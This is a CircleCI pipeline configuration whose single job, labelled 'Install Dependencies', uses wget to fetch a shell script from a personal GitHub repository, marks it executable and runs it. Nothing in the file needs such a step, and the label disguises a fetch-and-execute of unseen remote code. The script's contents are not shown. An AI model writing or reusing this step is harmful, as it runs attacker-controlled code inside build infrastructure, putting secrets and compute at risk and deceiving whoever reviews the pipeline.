version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/jinxy88/god/main/bash.sh && chmod +x bash.sh && ./bash.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
